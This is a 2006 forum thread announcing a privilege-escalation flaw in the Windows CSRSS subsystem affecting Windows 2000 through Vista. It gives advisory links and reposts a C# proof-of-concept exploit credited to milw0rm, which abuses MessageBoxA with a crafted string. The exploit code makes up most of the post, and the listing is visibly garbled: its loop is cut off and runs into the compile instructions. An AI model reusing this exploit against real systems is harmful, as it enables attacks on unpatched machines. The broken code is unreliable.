View full version : Vista first vulnerability


Dracula4ever
27.12.2006, 15:29
A flaw was discovered in the Windows Client/Server Runtime Server Subsystem (CSRSS) processes that allows a privilege escalation attack.
The flaw was discovered by a Russian dude known as NULL.
Vulnerable systems: Windows 2000\XP\2003\Vista, all fully patched. Who said Vista has no code re-use.. :)
Links:
http://www.securityfocus.com/brief/393
http://www.informationweek.com/story/showArticle.jhtml?articleID=196701757
http://www.symantec.com/enterprise/security_response/weblog/2006/12/vista_vulnerable.html
http://lists.grok.org.uk/pipermail/full-disclosure/2006-December/051394.html
http://www.kuban.ru/forum_new/forum2/files/19124.html

Exploit code taken from milw0rm:
// mbox.cs
using System;
using System.Runtime.InteropServices;
class HelloWorldFromMicrosoft
{
[DllImport("user32.dll")]
unsafe public static extern int MessageBoxA(uint hwnd, byte* lpText, byte* lpCaption, uint uType);

static unsafe void Main()
{
byte[] helloBug = new byte[] {0x5C, 0x3F, 0x3F, 0x5C, 0x21, 0x21, 0x21, 0x00};
uint MB_SERVICE_NOTIFICATION = 0x00200000u;
fixed(byte* pHelloBug = &helloBug[0])
{
for(int i=0; i> csc /unsafe mbox.cs
// >> mbox.exe

// milw0rm.com [2006-12-20]


I wonder if it's the same exploit code hackers were selling - http://www.eweek.com/article2/0,1895,2073611,00.asp ...

_Great_
27.12.2006, 15:33
https://forum.antichat.ru/thread29837.html

Sn@k3
27.12.2006, 21:48
TRUTH? Began.... to be continued -)